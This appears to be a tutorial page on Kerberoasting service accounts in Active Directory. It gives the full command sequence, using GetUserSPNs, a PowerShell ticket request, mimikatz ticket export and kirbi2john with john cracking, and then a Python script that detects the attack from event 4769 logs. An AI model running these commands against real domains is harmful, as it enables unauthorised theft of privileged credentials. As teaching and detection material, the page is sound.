Service-Account-Attack
A service account is a “non-human” account used to run services or applications. It is distinct from administrative accounts and other “human” accounts that administrators or employees use interactively. Service accounts also often hold privileged access to computers, applications, and data, which makes them highly valuable to attackers.
Extracting Service Account Passwords with Kerberoasting
Kerberoasting takes advantage of how service accounts leverage Kerberos authentication with Service Principal Names (SPNs).
First we need to find the Service Principal Names using GetUserSPNs.ps1.
.\GetUserSPNs.ps1
We will go for MSSQLSvc.
Request Service Tickets for service account SPNs
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/x.y.com:1433"
Extract Service Tickets Using Mimikatz
.\mimikatz.exe
privilege::debug
kerberos::list /export
We’ve successfully exported the .kirbi files. Grab the MSSQL one and copy it to the attacker machine.
Crack the Tickets
We are going to use kirbi2john.py to convert the ticket into a john hash and then crack it with john.
python3 kirbi2john.py -o hash mssql.kirbi
Now the hash is in john format. We can try to crack it.
john hash --wordlist=/home/kali/Downloads/rockyou.txt
john hash --show
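From the defender's side, the procedure above leaves a trace in the domain controller's Security log: each service-ticket request is logged as event 4769, and a ticket for a non-machine service account with Ticket Encryption Type 0x17 (RC4-HMAC) is the classic Kerberoasting indicator, since the RC4 ticket is what the cracking step targets. The following detection logic is an added example, not code from the original page; the record fields and the sample log entries are constructed, and the account names are hypothetical.

```python
# Added example: flag likely Kerberoasting from Windows Security event 4769
# records. Fields mirror the 4769 message: Account Name (requester),
# Service Name (service account), Ticket Encryption Type, Client Address.
from collections import defaultdict
from dataclasses import dataclass

RC4_HMAC = "0x17"   # etype 23; AES tickets are logged as 0x11 / 0x12

@dataclass
class TgsRequest:
    account: str   # requesting user (Account Name)
    service: str   # Service Name, i.e. the SPN's owning account
    etype: str     # Ticket Encryption Type as logged in 4769
    client: str    # Client Address

def is_roast_candidate(req: TgsRequest) -> bool:
    """True when a single 4769 record looks like a Kerberoast request."""
    svc = req.service.lower()
    # Machine accounts ($) and krbtgt are not what Kerberoasting targets.
    if svc.endswith("$") or svc == "krbtgt":
        return False
    # Caveat: environments that never enabled AES on a service account
    # will log RC4 legitimately; tune the threshold below for those.
    return req.etype.lower() == RC4_HMAC

def find_kerberoasting(records, threshold=2):
    """Return {account: sorted service names} for every requester that
    pulled RC4 tickets for at least `threshold` distinct service accounts."""
    hits = defaultdict(set)
    for r in records:
        if is_roast_candidate(r):
            hits[r.account].add(r.service)
    return {a: sorted(s) for a, s in hits.items() if len(s) >= threshold}

# Constructed sample records (hypothetical, not real log data)
SAMPLE = [
    TgsRequest("alice", "WS01$", "0x12", "10.0.0.5"),     # AES, machine account
    TgsRequest("bob", "mssqlsvc", "0x17", "10.0.0.9"),    # RC4 for a service account
    TgsRequest("bob", "httpsvc", "0x17", "10.0.0.9"),     # second SPN, same requester
    TgsRequest("bob", "krbtgt", "0x12", "10.0.0.9"),      # TGT renewal, ignored
    TgsRequest("carol", "mssqlsvc", "0x12", "10.0.0.7"),  # AES ticket, not suspicious
]

if __name__ == "__main__":
    for account, services in find_kerberoasting(SAMPLE).items():
        print(f"possible Kerberoasting by {account}: {', '.join(services)}")
```

Requiring several distinct SPNs per requester keeps a single legacy RC4 service from firing the alert, while a burst like the GetUserSPNs-then-request flow above still does.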